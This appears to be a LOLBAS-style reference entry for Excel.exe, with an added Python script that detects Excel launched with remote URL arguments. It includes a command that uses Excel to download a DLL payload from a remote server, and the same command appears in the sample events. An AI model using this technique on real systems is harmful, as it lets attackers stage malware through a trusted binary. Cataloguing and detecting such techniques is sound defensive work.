Excel.exe

Microsoft Office binary


Paths:


Resources:
https://twitter.com/reegun21/status/1150032506504151040
https://medium.com/@reegun/unsanitized-file-validation-leads-to-malicious-payload-download-via-office-binaries-202d02db7191

Acknowledgement:
Reegun J (OCBC Bank) - @reegun21


Detection:



Download

Downloads payload from remote server
Excel.exe http://192.168.1.10/TeamsAddinLoader.dll
Usecase: It will download a remote payload and place it in the cache folder
Privileges required: User
OS: Windows
Mitre: T1105
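
Detection logic for the command above, added here as an example (it is not from the original page or the LOLBAS project): it flags process-creation events where Excel.exe is started with an http(s) URL argument, and rates non-spreadsheet URLs higher. The field names `Image`, `CommandLine` and `Computer` follow Sysmon Event ID 1; the sample events, the install path and the expected-extension list are constructed assumptions.

```python
import ntpath
import shlex
from urllib.parse import urlparse

# Assumption: extensions Excel is normally asked to open; tune for your environment.
EXPECTED_EXT = {".xls", ".xlsx", ".xlsm", ".xlsb", ".xltx", ".xltm", ".csv"}

def remote_args(command_line):
    """Return the http(s) URLs passed as arguments on a Windows command line."""
    try:
        tokens = shlex.split(command_line, posix=False)  # keeps backslashes intact
    except ValueError:  # unbalanced quotes: fall back to a whitespace split
        tokens = command_line.split()
    urls = []
    for tok in tokens[1:]:  # tokens[0] is the program itself
        tok = tok.strip("\"'")
        try:
            parsed = urlparse(tok)
        except ValueError:  # malformed URL-like token
            continue
        if parsed.scheme in ("http", "https") and parsed.netloc:
            urls.append(tok)
    return urls

def check_event(event):
    """Return a finding when Excel.exe is started with a remote URL argument, else None."""
    if ntpath.basename(event.get("Image", "")).lower() != "excel.exe":
        return None
    findings = []
    for url in remote_args(event.get("CommandLine", "")):
        ext = ntpath.splitext(urlparse(url).path)[1].lower()
        # A URL that is not a spreadsheet (the page's example is a .dll) rates higher.
        severity = "medium" if ext in EXPECTED_EXT else "high"
        findings.append({"url": url, "extension": ext, "severity": severity})
    if not findings:
        return None
    return {"host": event.get("Computer"), "mitre": "T1105", "findings": findings}

# Constructed sample events (not real telemetry); the install path is illustrative.
EXCEL = r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE"
SAMPLE_EVENTS = [
    {"Computer": "WS01", "Image": EXCEL,
     "CommandLine": f'"{EXCEL}" http://192.168.1.10/TeamsAddinLoader.dll'},
    {"Computer": "WS02", "Image": EXCEL, "CommandLine": f'"{EXCEL}" "C:\\Users\\a\\report.xlsx"'},
    {"Computer": "WS03", "Image": EXCEL, "CommandLine": "EXCEL.EXE https://intranet.example/budget.xlsx"},
    {"Computer": "WS04", "Image": r"C:\Windows\System32\notepad.exe",
     "CommandLine": "notepad.exe http://192.168.1.10/TeamsAddinLoader.dll"},
]

if __name__ == "__main__":
    for ev in SAMPLE_EVENTS:
        print(ev["Computer"], check_event(ev))
```

Legitimate opens of remote workbooks will surface at `medium`, so baseline those sources before alerting on them.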